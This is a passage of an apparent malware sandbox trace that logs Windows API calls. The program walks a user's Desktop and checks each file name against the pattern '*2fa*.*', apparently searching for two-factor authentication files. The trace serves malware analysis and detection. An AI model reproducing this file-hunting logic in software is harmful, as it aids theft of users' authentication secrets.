dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaab0, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.869] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaab0 | out: hHeap=0x29a0000) returned 1 [0110.869] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*2fa*.*") returned 0 [0110.869] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.869] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb7dc60, ftCreationTime.dwHighDateTime=0x1d7aa10, ftLastAccessTime.dwLowDateTime=0xa18851b0, ftLastAccessTime.dwHighDateTime=0x1d7ac6c, ftLastWriteTime.dwLowDateTime=0xa18851b0, ftLastWriteTime.dwHighDateTime=0x1d7ac6c, nFileSizeHigh=0x0, nFileSizeLow=0x10367, dwReserved0=0x0, dwReserved1=0x0, cFileName="VbI-8gh.mkv", cAlternateFileName="")) returned 1 [0110.869] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.870] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.870] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VbI-8gh.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv" [0110.870] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.870] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.870] lstrcatW (in: lpString1="\\", lpString2="VbI-8gh.mkv" | out: lpString1="\\VbI-8gh.mkv") returned="\\VbI-8gh.mkv" [0110.870] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.870] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", lpUsedDefaultChar=0x0) returned 43 [0110.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac30, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.870] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac30 | out: hHeap=0x29a0000) returned 1 [0110.870] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*2fa*.*") returned 0 [0110.870] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.871] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51556710, ftCreationTime.dwHighDateTime=0x1d7a815, ftLastAccessTime.dwLowDateTime=0xb84e1ac0, ftLastAccessTime.dwHighDateTime=0x1d7a9ff, ftLastWriteTime.dwLowDateTime=0xb84e1ac0, ftLastWriteTime.dwHighDateTime=0x1d7a9ff, nFileSizeHigh=0x0, nFileSizeLow=0x888f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wwAL7t.mp4", cAlternateFileName="")) returned 1 [0110.871] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.871] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.871] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="wwAL7t.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4" [0110.871] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.871] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.871] lstrcatW (in: lpString1="\\", lpString2="wwAL7t.mp4" | out: lpString1="\\wwAL7t.mp4") returned="\\wwAL7t.mp4" [0110.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aab88, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.871] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab88 | out: hHeap=0x29a0000) returned 1 [0110.871] PathMatchSpecW (pszFile="wwAL7t.mp4", pszSpec="*2fa*.*") returned 0 [0110.871] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.871] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa619a40, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x562811b0, ftLastAccessTime.dwHighDateTime=0x1d7af50, ftLastWriteTime.dwLowDateTime=0x562811b0, ftLastWriteTime.dwHighDateTime=0x1d7af50, nFileSizeHigh=0x0, nFileSizeLow=0x1057b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDMAiqRYF.jpg", cAlternateFileName="XDMAIQ~1.JPG")) returned 1 [0110.871] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.871] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.871] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg" [0110.871] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.871] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.871] lstrcatW (in: lpString1="\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="\\XDMAiqRYF.jpg") returned="\\XDMAiqRYF.jpg" [0110.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", lpUsedDefaultChar=0x0) returned 45 [0110.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac00, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.872] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac00 | out: hHeap=0x29a0000) returned 1 [0110.872] PathMatchSpecW (pszFile="XDMAiqRYF.jpg", pszSpec="*2fa*.*") returned 0 [0110.872] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.872] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99eb9cb0, ftCreationTime.dwHighDateTime=0x1d7aca7, ftLastAccessTime.dwLowDateTime=0x28bfee50, ftLastAccessTime.dwHighDateTime=0x1d7ae51, ftLastWriteTime.dwLowDateTime=0x28bfee50, ftLastWriteTime.dwHighDateTime=0x1d7ae51, nFileSizeHigh=0x0, nFileSizeLow=0x1505d, dwReserved0=0x0, dwReserved1=0x0, cFileName="xmxJletH7GW6y.bmp", cAlternateFileName="XMXJLE~1.BMP")) returned 1 [0110.872] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.872] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.872] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp" [0110.872] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.872] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.872] lstrcatW (in: lpString1="\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="\\xmxJletH7GW6y.bmp") returned="\\xmxJletH7GW6y.bmp" [0110.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x38ea518, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", lpUsedDefaultChar=0x0) returned 49 [0110.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aac18, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.872] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac18 | out: hHeap=0x29a0000) returned 1 [0110.872] PathMatchSpecW (pszFile="xmxJletH7GW6y.bmp", pszSpec="*2fa*.*") returned 0 [0110.872] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d20 | out: hHeap=0x29a0000) returned 1 [0110.872] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995fa10, ftCreationTime.dwHighDateTime=0x1d7a3b6, ftLastAccessTime.dwLowDateTime=0x6882a8f0, ftLastAccessTime.dwHighDateTime=0x1d7aec6, ftLastWriteTime.dwLowDateTime=0x6882a8f0, ftLastWriteTime.dwHighDateTime=0x1d7aec6, nFileSizeHigh=0x0, nFileSizeLow=0x94d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBTl 8ysJ.mp3", cAlternateFileName="YBTL8Y~1.MP3")) returned 1 [0110.872] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.872] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.872] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3" [0110.872] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.872] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.872] lstrcatW (in: lpString1="\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="\\yBTl 8ysJ.mp3") returned="\\yBTl 8ysJ.mp3" [0110.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", lpUsedDefaultChar=0x0) returned 45 [0110.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aaac8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.873] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaac8 | out: hHeap=0x29a0000) returned 1 [0110.873] PathMatchSpecW (pszFile="yBTl 8ysJ.mp3", pszSpec="*2fa*.*") returned 0 [0110.873] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.873] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e10ef30, ftCreationTime.dwHighDateTime=0x1d7a5be, ftLastAccessTime.dwLowDateTime=0xe222b410, ftLastAccessTime.dwHighDateTime=0x1d7a972, ftLastWriteTime.dwLowDateTime=0xe222b410, ftLastWriteTime.dwHighDateTime=0x1d7a972, nFileSizeHigh=0x0, nFileSizeLow=0x1616d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZyW0U6HGvR1sY4.mkv", cAlternateFileName="ZYW0U6~1.MKV")) returned 1 [0110.873] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.873] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.873] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv" [0110.873] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.873] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.873] lstrcatW (in: lpString1="\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="\\ZyW0U6HGvR1sY4.mkv") returned="\\ZyW0U6HGvR1sY4.mkv" [0110.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x38ea298, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", lpUsedDefaultChar=0x0) returned 50 [0110.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aab88, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.873] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab88 | out: hHeap=0x29a0000) returned 1 [0110.873] PathMatchSpecW (pszFile="ZyW0U6HGvR1sY4.mkv", pszSpec="*2fa*.*") returned 0 [0110.873] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0110.873] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 1 [0110.873] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.874] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.874] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods" [0110.874] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.874] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.874] lstrcatW (in: lpString1="\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="\\_aNuOe6kDQsgIz0qDq.ods") returned="\\_aNuOe6kDQsgIz0qDq.ods" [0110.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x38ea918, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", lpUsedDefaultChar=0x0) returned 54 [0110.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=8, lpWideCharStr=0x29aabb8, cchWideChar=8 | out: lpWideCharStr="*2fa*.*") returned 8 [0110.874] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabb8 | out: hHeap=0x29a0000) returned 1 [0110.874] PathMatchSpecW (pszFile="_aNuOe6kDQsgIz0qDq.ods", pszSpec="*2fa*.*") returned 0 [0110.874] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b70 | out: hHeap=0x29a0000) returned 1 [0110.874] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 0 [0110.874] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0110.874] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.874] GetLastError () returned 0x12 [0110.874] SetLastError (dwErrCode=0x12) [0110.874] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0110.874] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2a08 [0110.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970510, cbMultiByte=31, lpWideCharStr=0x29a2a08, cchWideChar=31 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned 31 [0110.874] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0110.874] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0110.875] lstrcpyW (in: lpString1=0x19d240, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.875] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*" [0110.875] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0110.875] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.875] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.875] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\." [0110.875] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.875] lstrcatW (in: 